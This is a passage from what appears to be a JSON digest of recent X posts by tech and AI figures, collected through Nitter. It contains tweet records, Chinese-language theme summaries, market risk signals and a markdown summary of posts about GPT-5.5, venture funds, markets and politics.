Sacks", + "title": "Reverse discrimination does not undo historical injustices but rather perpetrates new ones against a different set of individuals. This foments social strife and undermines the ideal of America as a meritocracy. AI models should not be taught that this practice is justified.", + "url": "https://x.com/DavidSacks/status/2047103978979119580", + "published_at": "2026-04-23T00:03:16+00:00", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Dev is posting about price", + "url": "https://x.com/CryptoCred/status/2047079463750377958", + "published_at": "2026-04-22T22:25:51+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "<3 @infisical", + "url": "https://x.com/eladgil/status/2047052737762980083", + "published_at": "2026-04-22T20:39:39+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "We’ve post trained a model on top of Qwen that achieves Pareto optimality on accuracy-cost curves. \n\nUnlike our previous post trained models, this model has been trained to be good at search and tool calls simultaneously, allowing us to unify the tool call router and summarization together in one model. \n\nThe resulting model performs better than GPT and Sonnet in terms of cost efficiency to serve daily Perplexity queries in production. The production model runs on our own inference platform.\n\nWe’re already serving a significant chunk of our daily traffic with this model and intend to have it serve all of default traffic pretty soon. \n\nMore research to follow soon on models we’re training and deploying for Comet and Computer.", + "url": "https://x.com/AravSrinivas/status/2047019688920756504", + "published_at": "2026-04-22T18:28:20+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: We've published new research on how we post-train models for accurate search-augmented answers.\n\nOur SFT + RL pipeline improves search, citation quality, instruction following, and efficiency.\n\nWith Qwen models, we match or beat GPT models on factuality at a lower cost.", + "url": "https://x.com/AravSrinivas/status/2047016400292839808", + "published_at": "2026-04-22T18:15:16+00:00", + "source": "nitter" + }, + { + "handle": "morganhousel", + "account": "@morganhousel", + "name": "Morgan Housel", + "title": "\"Self-control is empathy with your future self.\" - Seinfeld", + "url": "https://x.com/morganhousel/status/2047013991046881663", + "published_at": "2026-04-22T18:05:41+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Introducing USVC - a single basket of high-growth venture capital, for everyone. \n\nNo accreditation required, SEC-registered, and a very low $500 minimum. \n\nIncludes OpenAI, Anthropic, xAI, Sierra, Crusoe, Legora, and Vercel. As USVC adds more companies, investors will own a piece of that too. \n\nLiquidity typically comes when companies exit, but we’re aiming to let investors redeem up to 5% of the fund every quarter. This isn’t guaranteed, but if we can make it work, you won’t be locked up like in a traditional venture fund.\n\nIt runs on AngelList, which already supports $125 billion of investor capital. \n\nAnd I’ve joined USVC as the Chairman of its Investment Committee.\n—\n\nGo back to the 1500s, you set sail for the new world to find tons of gold - that was adventure capital. \n\nEarly-stage technology is the modern version. It says we are going to create something new, and it’s risky. It’s daring.\n\nBut ordinary people can’t invest until it’s old, until it’s no longer interesting, until everybody has access to it. By the time a stock IPOs, most of the alpha is gone. The adventure is gone. Public market investors are literally last in line.\n\nThis problem has become farcical in the last decade. Startups are reaching trillion dollar valuations in the private markets while ordinary investors have their noses up to the glass, wondering when they’ll be let in.\n\nInvesting in private markets isn’t easy. You need feet on the ground. You need judgment built over years. Most people don’t have the patience to wait ten or twenty years for an investment to come to fruition.\n\nBut there is no more productive, harder-working way to deploy a dollar than in true venture capital.\n\nUSVC enables you to invest in venture capital in a broad, accessible, professionally-managed way, through a single basket of innovation, focused on high-growth startups, at all stages. \n\nIt is how you bet on the future of tech: the smartest young people in the world, working insane hours, leveraged to the max, with code, hardware, capital, media, and community. Your dollar doesn’t work harder anywhere.\n\nThere is an old line - in the future, either you are telling a computer what to do, or a computer is telling you what to do. You don’t want to be on the wrong side of that transaction.\n\nUSVC lets you buy the future, but you buy it now. Then you wait, and if you are right, you get paid.\n\nGet access here:\n\nhttp://usvc.com", + "url": "https://x.com/naval/status/2046991137022648800", + "published_at": "2026-04-22T16:34:52+00:00", + "source": "nitter" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work!\nAsk Codex to implement a segmented file downloader: didn’t even get the completion block hooked up right.", + "url": "https://x.com/liuliu/status/2046986486629986435", + "published_at": "2026-04-22T16:16:24+00:00", + "source": "nitter" + }, + { + "handle": "karpathy", + "account": "@karpathy", + "name": "Andrej Karpathy", + "title": "RT by @karpathy: Imagine every pixel on your screen, streamed live directly from a model. No HTML, no layout engine, no code. Just exactly what you want to see.\n\n@eddiejiao_obj, @drewocarr and I built a prototype to see how this could actually work, and set out to make it real. We're calling it Flipbook. (1/5)", + "url": "https://x.com/karpathy/status/2046982383430496444", + "published_at": "2026-04-22T16:00:05+00:00", + "source": "nitter" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Announcing my new thing:\n\nI'm launching a new public venture fund\n\nUSVC is built by AngelList with @naval shaping our investment strategy in the technology companies building our future\n\nAnd unlike traditional venture funds, everyone can invest along with just $500:", + "url": "https://x.com/naval/status/2046961436593713241", + "published_at": "2026-04-22T14:36:51+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 founders over 10 years. If I could only invest in five, this would be them: \n\n1. Nik Storonsky (Revolut) \n\n2. @alanchanguk (Fuse Energy) \n\n3. Adam Foroughi (AppLovin) \n\n4. @awxjack (Airwallex) \n\n5. @MaxJunestrand (Legora)\n\nOk one more… \n\n6. @vladtenev (Robinhood) \n\nPS. No order intended.", + "url": "https://x.com/HarryStebbings/status/2046938853445959738", + "published_at": "2026-04-22T13:07:07+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "What a time to be alive", + "url": "https://x.com/eladgil/status/2046722094348771758", + "published_at": "2026-04-21T22:45:48+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "👀", + "url": "https://x.com/eladgil/status/2046695194054320150", + "published_at": "2026-04-21T20:58:54+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 CEOs of the largest companies over the last 10 years. \n\nAdam Foroughi is top 5 I have ever met. Easily. \n\nAppLovin Market Cap: $160BN \n\nRevenue: $5.48BN \n\nEBITDA per Head: $10M\n\nThere is no company on the planet with numbers like AppLovin. \n\nEpisode coming 👇", + "url": "https://x.com/HarryStebbings/status/2046684883494600911", + "published_at": "2026-04-21T20:17:56+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "The dark alchemy that is loonen sparkling + salt of the earth electrolytes 😱", + "url": "https://x.com/eladgil/status/2046674350993223784", + "published_at": "2026-04-21T19:36:05+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/", + "url": "https://x.com/JeffDean/status/2046673188193701901", + "published_at": "2026-04-21T19:31:28+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "AI for email++", + "url": "https://x.com/eladgil/status/2046640542218604783", + "published_at": "2026-04-21T17:21:44+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "As agentic workloads expand, the best orchestration hybridizes centralized servers and CPUs for the ultimate continuity. Especially when you want your AI to use your local apps and messages.", + "url": "https://x.com/AravSrinivas/status/2046638770162995603", + "published_at": "2026-04-21T17:14:42+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: The future of computer vision is agentic.\n\n1/ We built Nomadic around a gap we kept seeing in video understanding: VLMs generate chain-of-thought that's fluent and often correct in structure, but weakly grounded in what's actually in the video.\n\nThis limitation shows up in cases like \"rolling stops\". Is the stop sign actually associated with the vehicle’s lane? Does the ego vehicle ever come to a full stop, or only decelerate?", + "url": "https://x.com/JeffDean/status/2046635685206208533", + "published_at": "2026-04-21T17:02:26+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Following positive feedback from other venues, like STOC and ICML, NeurIPS is pleased to announce a new initiative in partnership with Google: for NeurIPS 2026, authors will have access to Google's Paper Assistant Tool (PAT) to help improve their submissions. \n\nThis program offers authors the opportunity to receive free, automated, and actionable feedback on their manuscripts before the final deadline, private to the authors. It is a completely optional service that is kept strictly private to the authors and will not be used in the review process.\n\nRead more in our blog post: https://blog.neurips.cc/2026/04/21/neurips-supports-authors-with-googles-paper-assistant-tool-pat/", + "url": "https://x.com/JeffDean/status/2046632664493384060", + "published_at": "2026-04-21T16:50:26+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: This is insane…\n\nThe Virginia redistricting amendment on the ballot today is framed as a vote to \"restore fairness in the upcoming elections.\"\n\nIn reality, it turns a state that Kamala barely won by 5 pts from 6D-5R to 10D-1R.", + "url": "https://x.com/DavidSacks/status/2046632586735243420", + "published_at": "2026-04-21T16:50:07+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "In a world of agents, how do software providers prevent themselves from becoming valueless databases?\n\n\"The value proposition has to be:\n\n1. How good are your APIs?\n\n2. How well designed are they\n\n3. Are they ready for agents?\n\n4. Can you monetize that in some way?\n\nWe are treating software too much like one monolithic industry.\n\nThere's a lot of categories of software where agents using the tools is a massive boon for the technology as opposed to a dilemma.\" @levie\n\nLove to hear your thoughts on this @Benioff @dharmesh @mcannonbrookes @rauchg @mcuban", + "url": "https://x.com/HarryStebbings/status/2046614183513604299", + "published_at": "2026-04-21T15:37:00+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "⌘ ⌘", + "url": "https://x.com/AravSrinivas/status/2046606492649091212", + "published_at": "2026-04-21T15:06:26+00:00", + "source": "nitter" + }, + { + "handle": "morganhousel", + "account": "@morganhousel", + "name": "Morgan Housel", + "title": "RT by @morganhousel: I’m in love with this sentence:\n\n“The best math you can learn is how to calculate the future cost of current decisions.”", + "url": "https://x.com/morganhousel/status/2046429717834654025", + "published_at": "2026-04-21T03:24:00+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "RT by @AravSrinivas: Whoa 🤯", + "url": "https://x.com/AravSrinivas/status/2046419556424675677", + "published_at": "2026-04-21T02:43:37+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "🔥", + "url": "https://x.com/eladgil/status/2046375878368940239", + "published_at": "2026-04-20T23:50:03+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "", + "url": "https://x.com/AravSrinivas/status/2046347469488107839", + "published_at": "2026-04-20T21:57:10+00:00", + "source": "nitter" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: Read how Google built custom silicon and infrastructure - and how it's benefiting customers today - in the latest from @Bloomberg. We'll share more updates this week at #GoogleCloudNext. \nhttps://www.bloomberg.com/news/features/2026-04-20/google-eyes-new-chips-to-speed-up-ai-results-challenging-nvidia?srnd=undefined", + "url": "https://x.com/JeffDean/status/2046344875994739028", + "published_at": "2026-04-20T21:46:52+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "很多事情抽象几层之后,就发现底层逻辑是一样的, 而且非常简单。同样的底层逻辑,就可以举一反三,产生组合性和复利。从表象之下抽象出本质,有时会非常费力,因为太多信息迷雾,或者利益相关者搅浑水。所以复利只能在自己有信息优势,看得清楚的地方产生。搅浑水的人有动机用完全错误的信息诱导一批人接受他的错误的逻辑,然后你发现这些错误的逻辑在别的地方不适用,但又不理解是为什么。", + "url": "https://x.com/svwang1/status/2046343776378257515", + "published_at": "2026-04-20T21:42:30+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "很多慈善机构最后异化成圈钱的工具,用类似的话术来货币化他人的善心。甚至它所有的流程都在表面上都非常合规,但和慈善的精神和最终目的没有太大关系了。所有以 KPI 管理的机构最终都会变成这样。", + "url": "https://x.com/svwang1/status/2046336504407142606", + "published_at": "2026-04-20T21:13:36+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: Link to fuller post:\nhttps://substack.com/home/post/p-194229552?source=queue", + "url": "https://x.com/eladgil/status/2046300649483374704", + "published_at": "2026-04-20T18:51:07+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Here is the sbstack version\n\n\"Random thoughts while gazing at the misty AI Frontier\"\n\nhttps://blog.eladgil.com/p/random-thoughts-while-gazing-at-the", + "url": "https://x.com/eladgil/status/2046284381439103043", + "published_at": "2026-04-20T17:46:29+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 13/12 Anti-AI regulation & violence will both increase\n\nIt is important for leaders in tech and AI to point out the benefits of AI to society and the world more aggressively", + "url": "https://x.com/eladgil/status/2046284194943500453", + "published_at": "2026-04-20T17:45:44+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 12/12 Most AI companies should consider exiting in the next 12-18 months", + "url": "https://x.com/eladgil/status/2046284191885922498", + "published_at": "2026-04-20T17:45:44+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 11/12 AI is about selling work, not software. Units of labor as the product\n\nThis is a big shift in TAM, agents, how to build product in the AI era. Many AI markets are 10-100X the size of their seat based software counterparts", + "url": "https://x.com/eladgil/status/2046284190132609299", + "published_at": "2026-04-20T17:45:43+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 10/12 Harness creating more and more stickiness to models\n\nIf you look at the use of AI coding tools, the harness (and broader product surface area eg UX, workflow, etc) seems to be increasingly sticky in the short term.\n\nIt is not just the model you use, but the environment, prompting, etc you build around it that helps impact your choice. Brand also matters more then many people think. At some point, either one coding model breaks very far ahead, or they stay neck in neck. How important is the harness/workflow long term for defensibility for coding or enterprise applications?", + "url": "https://x.com/eladgil/status/2046284188622737554", + "published_at": "2026-04-20T17:45:43+00:00", + "source": "nitter" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "R to @eladgil: 9/12 Artisanal engineers will be be increasingly unhappy inside companies.\n\nDeep artisanal “my code is my craft” and “I love creating bespoke things” engineers decreasingly happy in world of AI. Systems thinkers and product thinkers engineers happiest. Many people are a mix of both", + "url": "https://x.com/eladgil/status/2046284184877187540", + "published_at": "2026-04-20T17:45:42+00:00", + "source": "nitter" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Dwarkesh is not an AGI party bro. He's been pretty diverse in how he seeks alpha from across a wide variety of industries. I enjoy the hell out of a lot of his podcasts.\nThis podcast though, his questions and narrative are very AGI Party takes, because I think they're very low-rank. That's my opinion.", + "url": "https://x.com/soumithchintala/status/2046282944139215141", + "published_at": "2026-04-20T17:40:46+00:00", + "source": "nitter" + } + ], + "top_themes": [ + { + "title": "其他", + "count": 170 + }, + { + "title": "模型能力", + "count": 53 + }, + { + "title": "交易与市场", + "count": 15 + }, + { + "title": "投融资与并购", + "count": 13 + }, + { + "title": "算力与芯片", + "count": 8 + } + ], + "modules": { + "themes": [ + { + "id": "t1", + "title": "Sam Altman:重新思考操作系统和UI设计", + "subtitle": "Altman暗示AI将改变人机交互范式", + "bullets": [ + "微软仍是主要云伙伴,但OpenAI产品将可在所有云上使用", + "认为现在是认真重新思考操作系统和用户界面设计的好时机", + "提出应有一个人类和AI代理都能使用的协议" + ], + "samples": [ + { + "text": "feels like a good time to seriously rethink how operating systems and user interfaces are designed\n\n(also the internet; there should be a protocol that is equally usable by people and agents)", + "url": "https://x.com/sama/status/2048428561481265539", + "handle": "sama", + "date": "2026-04-26" + }, + { + "text": "we have updated our partnership with microsoft.\n\nmicrosoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.\n\nwill continue to provide them with models and products until 2032, and a revenue share through 203", + "url": "https://x.com/sama/status/2048755148361707946", + "handle": "sama", + "date": "2026-04-27" + } + ] + }, + { + "id": "t2", + "title": "AI-native工程团队的工作方式演进", + "subtitle": "Andrew Ng深度分析AI编程带来的变化", + "bullets": [ + "AI-native团队使用编码代理构建产品速度更快", + "不仅改变开发速度,还改变了团队运营方式", + "高质量工程师角色转变为更多监督和审查" + ], + "samples": [ + { + "text": "AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to many other changes in how we operate. For example, some great engineers now play", + "url": "https://x.com/AndrewYNg/status/2048793852702757151", + "handle": "AndrewYNg", + "date": "2026-04-27" + } + ] + }, + { + "id": "t3", + "title": "宏观叙事:美股估值与央行政策", + "subtitle": "Charlie Bilello警示市场信号", + "bullets": [ + "S&P 500的CAPE比率升至41,创2000年以来最高,超过99%历史估值", + "美联储扩张资产负债表(QE),但市场仍创新高", + "2026年跟随2025剧本,交易员对极端言论免疫,更自信抄底" + ], + "samples": [ + { + "text": "The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX", + "url": "https://x.com/charliebilello/status/2048753179471323584", + "handle": "charliebilello", + "date": "2026-04-27" + }, + { + "text": "2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending the stock market quickly back to new all-time highs. $SPX", + "url": "https://x.com/charliebilello/status/2048761760971096534", + "handle": "charliebilello", + "date": "2026-04-27" + } + ] + } + ], + "p0_events": [ + { + "id": "p04", + "title": "GPT-5.5成为Perplexity默认编排模型", + "meta": "2026-04-24 | @AravSrinivas", + "summary": "用户消耗更少算力 credits,可运行更多任务", + "url": "https://x.com//status/2047788775468908840" + }, + { + "id": "p05", + "title": "Paul Graham:初创公司不必担心被模型公司吞噬", + "meta": "2026-04-27 | @paulg", + "summary": "担心被模型公司吃掉就像担心成为明星后生活受限", + "url": "https://x.com//status/2048677984106664227" + }, + { + "id": "p06", + "title": "Marc Andreessen:软件即提示", + "meta": "2026-04-27 | @pmarca", + "summary": "软件只是下一个版本软件的提示", + "url": "https://x.com//status/2048573035616375134" + } + ], + "top_quotes": [ + { + "id": "q2", + "quote": "When one thing becomes abundant and cheap, another thing becomes scarce and valuable.", + "speaker": "Marc Andreessen", + "date": "2026-04-27", + "note": "一句话道出AI时代的价值转移逻辑", + "url": "https://x.com/Marc Andreessen/status/2048624098398650608" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "AI模型进展", + "subtitle": "行业持续快速迭代", + "level": "P0", + "items": [ + { + "text": "GPT-5.5发布反响热烈", + "url": "https://x.com//status/2048554097985593849" + }, + { + "text": "Perplexity默认模型切换至GPT-5.5", + "url": "https://x.com//status/2047753276888854595" + } + ] + }, + { + "id": "c2", + "title": "AI编程工具", + "subtitle": "编码代理实战表现", + "level": "P0", + "items": [ + { + "text": "Codex在企业内部部署效果显著", + "url": "https://x.com//status/2048165186482389253" + }, + { + "text": "研究人员让GPT-5.5独立运行实验", + "url": "https://x.com//status/2047386955550470245" + } + ] + }, + { + "id": "c3", + "title": "宏观市场", + "subtitle": "美股风险信号积累", + "level": "P1", + "items": [ + { + "text": "通胀持续高于美联储目标61个月", + "url": "https://x.com//status/2048406550897729561" + } + ] + }, + { + "id": "c4", + "title": "AI安全与批评", + "subtitle": "GaryMarcus持续警示", + "level": "P2", + "items": [ + { + "text": "AI代理是过早技术,推广太快", + "url": "https://x.com//status/2048757233174122827" + }, + { + "text": "vibe coding一代不懂备份", + "url": "https://x.com//status/2048593283639894520" + } + ] + }, + { + "id": "c5", + "title": "VC视角", + "subtitle": "行业方向判断", + "level": "P1", + "items": [] + }, + { + "id": "c6", + "title": "华语圈", + "subtitle": "待采集", + "level": "P2", + "items": [ + { + "text": "中文账号需X API获取,暂无可用数据", + "url": "" + } + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "HIGH", + "title": "美股估值极端化", + "detail": "CAPE比率41创25年新高,超过99%历史水平,但美联储仍在QE,市场过于乐观" + }, + { + "id": "r2", + "level": "MID", + "title": "AI代理安全隐患", + "detail": "GaryMarcus指出vibe-coded AI代理频繁造成数据丢失,用户缺乏必要的技术经验" + }, + { + "id": "r3", + "level": "OPP", + "title": "AI编程效率提升显著", + "detail": "研究人员可让GPT-5.5独立运行实验vernight,构建效率大幅提升,验证了Andrew Ng的观点" + } + ] + }, + "tweet_summary_md": "# X平台关注列表推文汇总\n\n**生成日期**: 2026-04-27T17:15:13.448908+00:00\n**数据来源**: Nitter RSS 订阅\n**时间范围**: 最近7天\n**账号总数**: 27 | **成功获取**: 21 | **推文总数**: 259\n\n---\n\n### ✅ @karpathy — Andrej Karpathy(1 条)\n\n**[2026-04-22T16:00:05+00:00]**\n> RT by @karpathy: Imagine every pixel on your screen, streamed live directly from a model. No HTML, no layout engine, no code. Just exactly what you want to see. @eddiejiao_obj, @drewocarr and I built…\n[原文链接](https://x.com/karpathy/status/2046982383430496444)\n\n---\n\n### ✅ @sama — Sam Altman(20 条)\n\n**[2026-04-27T13:24:26+00:00]**\n> we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds. will continue to pr…\n[原文链接](https://x.com/sama/status/2048755148361707946)\n\n**[2026-04-27T13:09:30+00:00]**\n> this is so good: https://paulgraham.com/kids.html\n[原文链接](https://x.com/sama/status/2048751392031203544)\n\n**[2026-04-27T00:05:31+00:00]**\n> so fun to see the reception to 5.5! there is almost nothing that feels more gratifying to me than builders saying they find our tools useful.\n[原文链接](https://x.com/sama/status/2048554097985593849)\n\n**[2026-04-26T23:59:53+00:00]**\n> Our Principles: Democratization, Empowerment, Universal Prosperity, Resilience, and Adaptability https://openai.com/index/our-principles/\n[原文链接](https://x.com/sama/status/2048552677433643427)\n\n**[2026-04-26T15:46:41+00:00]**\n> feels like a good time to seriously rethink how operating systems and user interfaces are designed (also the internet; there should be a protocol that is equally usable by people and agents)\n[原文链接](https://x.com/sama/status/2048428561481265539)\n\n**[2026-04-26T15:37:00+00:00]**\n> \"post-AGI, no one is going to work and the economy is going to collapse\" \"i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stret…\n[原文链接](https://x.com/sama/status/2048426122854228141)\n\n**[2026-04-26T02:15:19+00:00]**\n> RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day\n[原文链接](https://x.com/sama/status/2048224374264885396)\n\n**[2026-04-25T22:20:08+00:00]**\n> how can they write code so fast?!\n[原文链接](https://x.com/sama/status/2048165186482389253)\n\n**[2026-04-25T22:01:18+00:00]**\n> R to @sama: (and we will fix the former)\n[原文链接](https://x.com/sama/status/2048160448340767038)\n\n**[2026-04-25T22:01:08+00:00]**\n> we still get looksmaxxed on frontend a little but we IQmog hard now\n[原文链接](https://x.com/sama/status/2048160404376105179)\n\n**[2026-04-25T15:31:08+00:00]**\n> 5.5 is so earnest \"little engine that could\" energy\n[原文链接](https://x.com/sama/status/2048062261584077149)\n\n**[2026-04-24T23:41:49+00:00]**\n> this was a good week. proud of the team. happy building!\n[原文链接](https://x.com/sama/status/2047823357635354814)\n\n**[2026-04-24T21:17:51+00:00]**\n> GPT-5.5 and GPT-5.5 Pro are now available in the API!\n[原文链接](https://x.com/sama/status/2047787124846653895)\n\n**[2026-04-24T14:27:13+00:00]**\n> 🫶\n[原文链接](https://x.com/sama/status/2047683787828703289)\n\n**[2026-04-24T00:33:16+00:00]**\n> RT by @sama: Today we open sourced many of OpenAI's monitorability evaluations. We hope that the research community and other model developers can build upon them and use them to evaluate the monitor…\n[原文链接](https://x.com/sama/status/2047473914528563592)\n\n**[2026-04-23T19:54:32+00:00]**\n> \"don't retweet this, don't retweet this, don't retweet this...\" ah fuck it, life imitates art.\n[原文链接](https://x.com/sama/status/2047403771416940715)\n\n**[2026-04-23T19:21:55+00:00]**\n> We tried a new thing with NVIDIA to roll out Codex across a whole company and it was awesome to see it work. Let us know if you'd like to do it at your company!\n[原文链接](https://x.com/sama/status/2047395562501411058)\n\n**[2026-04-23T19:09:11+00:00]**\n> embers\n[原文链接](https://x.com/sama/status/2047392357482639749)\n\n**[2026-04-23T18:47:43+00:00]**\n> RT by @sama: there are early signs of 5.5 being a competent ai research partner. several researchers let 5.5 run variations of experiments overnight given only a high level algorithmic idea, wake up …\n[原文链接](https://x.com/sama/status/2047386955550470245)\n\n**[2026-04-23T18:26:18+00:00]**\n> RT by @sama: New in the Codex app: - GPT-5.5 - Browser control - Sheets & Slides - Docs & PDFs - OS-wide dictation - Auto-review mode Enjoy!\n[原文链接](https://x.com/sama/status/2047381565534322694)\n\n---\n\n### ✅ @DarioAmodei — Dario Amodei(0 条)\n\n---\n\n### ✅ @AravSrinivas — Aravind Srinivas(10 条)\n\n**[2026-04-24T21:24:24+00:00]**\n> You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being cr…\n[原文链接](https://x.com/AravSrinivas/status/2047788775468908840)\n\n**[2026-04-24T19:03:21+00:00]**\n> We’re rolling out GPT 5.5 as the default orchestrator model for Perplexity Computer. We will be monitoring the user sentiment compared to Opus 4.7 as the default as the rollout expands. Let us know y…\n[原文链接](https://x.com/AravSrinivas/status/2047753276888854595)\n\n**[2026-04-24T18:44:19+00:00]**\n> RT by @AravSrinivas: GPT-5.5 is now available on Perplexity for Max subscribers. GPT-5.5 is also rolling out as the default orchestration model in Computer for both Pro and Max subscribers.\n[原文链接](https://x.com/AravSrinivas/status/2047748486767272243)\n\n**[2026-04-23T02:46:57+00:00]**\n> RT by @AravSrinivas: Kimi K2.6, the new state-of-the-art open-weight model from Moonshot, is now available for Pro and Max subscribers.\n[原文链接](https://x.com/AravSrinivas/status/2047145172337836139)\n\n**[2026-04-22T18:28:20+00:00]**\n> We’ve post trained a model on top of Qwen that achieves Pareto optimality on accuracy-cost curves. Unlike our previous post trained models, this model has been trained to be good at search and tool c…\n[原文链接](https://x.com/AravSrinivas/status/2047019688920756504)\n\n**[2026-04-22T18:15:16+00:00]**\n> RT by @AravSrinivas: We've published new research on how we post-train models for accurate search-augmented answers. Our SFT + RL pipeline improves search, citation quality, instruction following, an…\n[原文链接](https://x.com/AravSrinivas/status/2047016400292839808)\n\n**[2026-04-21T17:14:42+00:00]**\n> As agentic workloads expand, the best orchestration hybridizes centralized servers and CPUs for the ultimate continuity. Especially when you want your AI to use your local apps and messages.\n[原文链接](https://x.com/AravSrinivas/status/2046638770162995603)\n\n**[2026-04-21T15:06:26+00:00]**\n> ⌘ ⌘\n[原文链接](https://x.com/AravSrinivas/status/2046606492649091212)\n\n**[2026-04-21T02:43:37+00:00]**\n> RT by @AravSrinivas: Whoa 🤯\n[原文链接](https://x.com/AravSrinivas/status/2046419556424675677)\n\n**[2026-04-20T21:57:10+00:00]**\n> \n[原文链接](https://x.com/AravSrinivas/status/2046347469488107839)\n\n---\n\n### ✅ @AndrewYNg — Andrew Ng(1 条)\n\n**[2026-04-27T15:58:13+00:00]**\n> AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to…\n[原文链接](https://x.com/AndrewYNg/status/2048793852702757151)\n\n---\n\n### ✅ @ylecun — Yann LeCun(19 条)\n\n**[2026-04-26T18:31:11+00:00]**\n> RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs,…\n[原文链接](https://x.com/ylecun/status/2048469956627468510)\n\n**[2026-04-26T17:27:23+00:00]**\n> RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950. The National Science Board is …\n[原文链接](https://x.com/ylecun/status/2048453901930660058)\n\n**[2026-04-26T16:03:04+00:00]**\n> RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. Politicians never waste a good fake crisis, which is why they're perfect for…\n[原文链接](https://x.com/ylecun/status/2048432684930654430)\n\n**[2026-04-26T13:51:41+00:00]**\n> Shooting oneself in the foot? Nope. Shooting oneself in the prefrontal cortex.\n[原文链接](https://x.com/ylecun/status/2048399621492236615)\n\n**[2026-04-26T06:48:29+00:00]**\n> RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories. If you're on either side of this slider, congratulations, you may be a child in an adult costume body! Black an…\n[原文链接](https://x.com/ylecun/status/2048293118781296734)\n\n**[2026-04-25T19:15:22+00:00]**\n> RT by @ylecun: OPINION: \"Trump’s mismanagement has resulted in death, destruction, wasted tax 